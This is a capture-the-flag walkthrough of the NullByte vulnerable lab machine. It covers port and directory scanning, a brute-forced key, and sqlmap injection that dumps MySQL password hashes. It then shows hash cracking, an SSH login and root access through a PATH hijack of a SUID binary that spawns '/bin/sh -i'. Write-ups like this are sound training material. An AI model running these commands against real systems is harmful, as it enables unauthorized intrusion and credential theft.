NULLBYTE
Scanning
Nmap
➜ ~ sudo nmap -A -p- -T4 nullbyte.vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:51 EDT
Nmap scan report for nullbyte.vuln (172.16.129.141)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34372/tcp6 status
| 100024 1 45260/tcp status
| 100024 1 53470/udp6 status
|_ 100024 1 58576/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
45260/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:72:55:45 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.42 ms nullbyte.vuln (172.16.129.141)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.42 secondsEnumeration
port 80
landing page
Whatweb
➜ ~ sudo whatweb nullbyte.vuln
http://nullbyte.vuln [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[172.16.129.141], Title[Null Byte 00 - level 1]Check directory
➜ ~ gobuster dir -u http://nullbyte.vuln -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://nullbyte.vuln
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/13 11:56:52 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 297]
/.htaccess (Status: 403) [Size: 297]
/javascript (Status: 301) [Size: 319] [--> http://nullbyte.vuln/javascript/]
/phpmyadmin (Status: 301) [Size: 319] [--> http://nullbyte.vuln/phpmyadmin/]
/server-status (Status: 403) [Size: 301]
/uploads (Status: 301) [Size: 316] [--> http://nullbyte.vuln/uploads/]
===============================================================
2021/08/13 11:56:57 Finished
===============================================================This challenge is CTF style ...
IMG Metadata
lets check metadata of landing page image
➜ ~ curl http://nullbyte.vuln/main.gif -o img | exiftool img
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 16647 100 16647 0 0 2709k 0 --:--:-- --:--:-- --:--:-- 2709k
ExifTool Version Number : 12.16
File Name : img
Directory : .
File Size : 16 KiB
File Modification Date/Time : 2021:08:13 14:31:44-04:00
File Access Date/Time : 2021:08:13 14:31:44-04:00
File Inode Change Date/Time : 2021:08:13 14:31:44-04:00
File Permissions : rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071this line is interesting
Comment : P-): kzMb5nVYJw
intercept this page
brute forcing the only way
Exploiting
Brute forcing key
go for burp intruder
for payload i will use Seclists SecLists/Passwords/Common-Credentials/10k-most-common.txt
elite is the key
press <enter_key> only empty input
SQLmap
SQLmap against this input field
# identify DB
➜ ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=x' --dbs
. . .
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
. . .# dump data
➜ ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=' --batch --dump -C User,Password -T user -D mysqlBB
. . .
+------------------+-------------------------------------------------------+
| User | Password |
+------------------+-------------------------------------------------------+
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC |
| phpmyadmin | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
+------------------+-------------------------------------------------------+
. . .Remember
we have /phpmyadmin directory gobuster output
Credentials : root:sunnyvale
phpMyAdmin
dive to Database: seth Table: users
Credentials : ramses pass is hashed lets crack it :)
YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
decode base64
c6d6bd7ebf806f43c76acc3681703b81
crack the hash
omega i used hashes.com for hole process
Credentials : ramses:omega
SSH Connection
now lets connect to machine using SSH port 777
➜ ~ ssh ramses@nullbyte.vuln -p 777
The authenticity of host '[nullbyte.vuln]:777 ([172.16.129.141]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nullbyte.vuln]:777,[172.16.129.141]:777' (ECDSA) to the list of known hosts.
ramses@nullbyte.vuln's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$Privilege Escalation
SUID binary
ramses@NullByte:/var/www/backup$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfsthis file looks ... interesting :joy: /var/www/backup/procwatch lets take a look ...
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1487 pts/0 00:00:00 procwatch
1488 pts/0 00:00:00 sh
1489 pts/0 00:00:00 psthis file trigger ps command lets abuse it
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:$PATH
ramses@NullByte:/var/www/backup$ touch ps
ramses@NullByte:/var/www/backup$ echo '/bin/sh -i' > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
rootLast updated
